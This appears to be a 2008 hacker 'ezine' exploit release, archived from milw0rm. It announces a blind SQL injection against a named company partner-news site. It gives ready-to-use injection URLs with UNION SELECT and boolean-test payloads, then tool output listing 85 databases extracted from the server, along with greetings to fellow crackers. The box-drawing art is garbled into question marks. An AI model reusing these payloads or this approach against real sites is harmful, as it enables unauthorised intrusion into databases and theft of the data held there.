???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ EZINE ] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Website : symantec.com ? ? Famous Sites Can Be ?
? Vuln Type: Blind SQL Injection ? ? ?
? Method : GET ? ? Olso Vulned ?
? Critical : High [????????] ? ? ?
? Impact : Database access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
[+] Remote SQL
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3--
[+] Blind SQL
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0
[+] Text Change
Bedriftsfordelene ved sosiale nettverk
[+] Attack Results
[+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 18:00:05
[+] Number of Rows: 85
[0]: hv_kompaktseminar_2008
[1]: 3ds_statistics
[2]: channelevent
[3]: cpu_expertenforum_2008
[4]: cpu_xmas_2007
[5]: db_bt
[6]: db_bt2008
[7]: db_elearning
[8]: db_elearning2
[9]: db_farbreiz
[10]: db_hpcd
[11]: db_jsdesk
[12]: db_pepper_oktoberfest2008
[13]: db_ship
[14]: db_shop
[15]: db_shrek
[16]: db_shrek_handover
[17]: db_symantec
[18]: db_wordstock
[19]: demo_3ds_statistics
[20]: demo_ajaxfb
[21]: demo_bettgefluester
[22]: demo_compel_bs
[23]: demo_compel_tec
[24]: demo_db_elearning
[25]: demo_hp_smb_portal
[26]: demo_hpsmartportal
[27]: demo_hpsmartportal_at
[28]: demo_hpsmartportal_at_ch
[29]: demo_hpsmartportal_ch
[30]: demo_hpsmartportal_de
[31]: demo_hpsmartportal_nl
[32]: demo_hpsmartportal_nl_int
[33]: demo_iqpower
[34]: demo_kanalm
[35]: demo_panadress
[36]: demo_panadress_old
[37]: demo_pepper_joomla
[38]: demo_pepper_website
[39]: demo_pepperglobal
[40]: demo_pepperglobal_new
[41]: demo_phpproject
[42]: demo_preferred
[43]: demo_preferred_demo
[44]: demo_symantec
[45]: demo_test
[46]: demo_zukunftspodium
[47]: hp_elearning
[48]: hp_elearning_2
[49]: hp_mobiles-rechenzentrum
[50]: hp_mobiles-rechenzentrum_handover
[51]: hp_smb_portal
[52]: hv_management_2007
[53]: hv_management_2008
[54]: linde_ltip_08
[55]: linde_mtip_07
[56]: linde_tilia_edm
[57]: mysql
[58]: oktoberfest2007
[59]: oktoberfest_2008
[60]: opengeodb
[61]: partnernews_sep09
[62]: pepperglobal
[63]: pepperglobal_new
[64]: pepperglobal_statistics
[65]: phpmyadmin
[66]: preferred
[67]: preferred_handover
[68]: remoteshell
[69]: robertdill
[70]: symantec_ddc_2
[71]: symantec_partnernews
[72]: symantec_partnernews_0108
[73]: symantec_partnernews_0208
[74]: symantec_partnernews_0308
[75]: symantec_partnernews_0408
[76]: symantec_partnernews_0508
[77]: symantec_partnernews_0608
[78]: symantec_partnernews_0708
[79]: symantec_partnernews_0908
[80]: symantec_partnernews_handover
[81]: symantec_wordstock
[82]: tenovis_wcp_3_0
[83]: transcat_statistics
[84]: webcast_portal_3_3
[-] 00:58:04
[-] Total URL Requests 10602
[-] Done
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
??????????????????????????????????????????????????????????????????????????????
?? © CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# milw0rm.com [2008-10-07]
